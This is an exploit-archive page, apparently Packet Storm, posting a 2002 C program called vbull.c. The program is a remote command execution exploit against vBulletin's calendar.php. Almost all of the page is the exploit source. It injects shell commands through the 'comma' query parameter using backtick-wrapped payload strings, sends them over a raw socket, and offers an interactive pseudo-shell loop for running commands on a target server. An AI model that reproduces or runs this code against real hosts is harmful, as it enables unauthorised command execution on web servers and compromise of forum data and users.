exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

vbull.c

vbull.c
Posted Sep 25, 2002
Authored by Gosper

Vbulletin/calender.php remote command execution exploit.

tags | exploit, remote, php
SHA-256 | 696c47bb743d4c61635d2b53c61441cce1ff71882f95ce0d1f8c84b21ee7c0c4

vbull.c

Change Mirror Download
/* php2.c - Vbulletin/calender.php remote command execution exploit
*
* ATTENTION_THIS_IS_PRIVATE_SOURCE CODE_
*
* This code is unpublished property of gosper.
*
* This code may not be published, distributed or duplicated
* in any shape or form without prior written permission of
* gosper.
*
* thanks and shouts go out to ectos and tgrey ;)
*
* (C) COPYRIGHT Gosper , 2002 - gosper@nix.org
* all rights reserved
***********************************************************************
*/

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>

#define PORT 80
#define MAX 200
#define evil1 "/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60"
#define evil2 "%20%60;die();echo%22"

char exploit(char *host, char *string);
void usage(char *progname);
void interactive(char *host, char *path);
void search_replace(char *string, const char *find, const char *replace);

int main(int argc, char *argv[])
{
char buf[MAX], *command, *path, *host;
int res;
extern char *optarg;

if(argc > 1) {
host = argv[1]; // make things easier
while((res = getopt(argc, argv, "i:c:p:d")) != EOF) {
switch(res){

case 'c': command = optarg;
break;

case 'i': path = optarg;
//sprintf(buf, "GET %s%s%s%s\n" , path , evil1, command, evil2);
interactive(host, path);
//exit(0);
break;

case 'd': printf("%s" , buf);

default: usage(argv[0]);
break;
}

}

sprintf(buf, "GET %s%s%s\n" , evil1, command, evil2);
exploit(host, buf);
}
else
usage(argv[0]);
return 0;

}


char exploit(char *host, char *string){
int fd, data;
char buf[MAX], buf2[999], output[5000];

struct hostent *he;
struct sockaddr_in server;

if((he =gethostbyname(host))==NULL) {
printf("Error unknown host :( \n");
exit(-1);
}

if((fd=socket(AF_INET, SOCK_STREAM, 0))==-1){
printf("Couldnt open socket\n");
exit(-1);
}

server.sin_family = AF_INET;
server.sin_port = htons(PORT);
server.sin_addr = *((struct in_addr *)he->h_addr);
bzero(&(server.sin_zero),8);

if(connect(fd,(struct sockaddr*)&server,sizeof(struct sockaddr)) == -1){
printf("Couldnt connect to host\n");
exit(-1);
}


send(fd, string, sizeof(buf2), 0);
recv(fd, output, sizeof(output), 0);
printf("%s" , output);

close(fd);
}

void interactive(char *host, char *path) {
char shell[100], temp[MAX], *input;

printf("\n (C) Gosper 2002\n");
printf(" vbull, calendar.php exploit\n");

while(1){
printf("php# ");
fgets(shell, sizeof(shell), stdin);
search_replace(shell, " ", "%20");
input = malloc(strlen(shell)*sizeof(char));
memcpy(input, shell, strlen(shell)-1);
sprintf(temp, "GET %s%s%s%s\n" , path , evil1, input, evil2);
exploit(host, temp);
}
}

void search_replace(char *string, const char *find, const char *replace)
{

char final[MAX], temp[2];
size_t start, end, i;
while (strstr(string, find) != NULL) {
final[0] = '\0';
start = strstr(string, find) - string;
end = start + strlen(find);
temp[1] = '\0';
strncat(final, string, start);
strcat(final, replace);
for (i = end; string[i] != '\0'; i++) {
temp[0] = string[i];
strcat(final, temp);
}
sprintf(string, final);
}
return;
}

void usage(char *progname) {
printf("____________________________________\n");
printf(" calendar.php vbulletin exploit\n");
printf(" (C) COPYRIGHT Gosper 2002\n");
printf(" gosper@nix.org\n\n");
printf(" Usage: %s host -i path to calendar.php\n" , progname);
printf(" Ex: %s 127.0.0.1 -i /bbs\n" , progname);
exit(1);
}
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close